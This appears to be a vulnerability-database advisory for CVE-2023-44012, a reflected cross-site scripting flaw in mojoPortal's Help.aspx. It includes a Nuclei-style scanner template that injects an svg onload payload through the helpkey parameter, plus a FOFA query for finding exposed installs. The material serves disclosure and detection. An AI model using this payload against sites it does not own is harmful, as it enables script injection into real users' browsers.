CVE-2023-44012: mojoPortal v.2.7.0.0 - Cross-Site Scripting

2025-08-01 mojoPortal PoC Public

Description

Cross Site Scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component.

PoC

id: CVE-2023-44012

info:
  name: mojoPortal v.2.7.0.0 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Cross Site Scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component.
  impact: |
    Successful exploitation could allow an attacker to execute malicious scripts in the context of the victim's browser.
  remediation: |
    Upgrade to a patched version of mojoPortal to mitigate the Cross Site Scripting (XSS) vulnerability.
  reference:
    - https://github.com/Vietsunshine-Electronic-Solution-JSC/Vulnerability-Disclosures/tree/main/2023/CVE-2023-44012
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2023-44012
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-44012
    cwe-id: CWE-79
    epss-score: 0.01258
    epss-percentile: 0.68072
    cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mojoportal
    product: mojoportal
    fofa-query: title="mojoPortal"
  tags: cve,cve2023,mojoportal,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/Help.aspx?helpkey=xxxxxxx'><svg/onload=alert()+x="

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "mojoPortal", "mojo-accordion", "mojo-tabs")'
          - 'contains(body, "><svg/onload=alert()")'
          - 'contains(header, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100f49432cc979cea4606ebb7903360a3cbde858c3e96c89eeed9a34ca779be6dab0220072feee2e7b0567a1ed0c9db929fab22f0e1a1fd30b3fb566cfa2dd38e8bae54:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities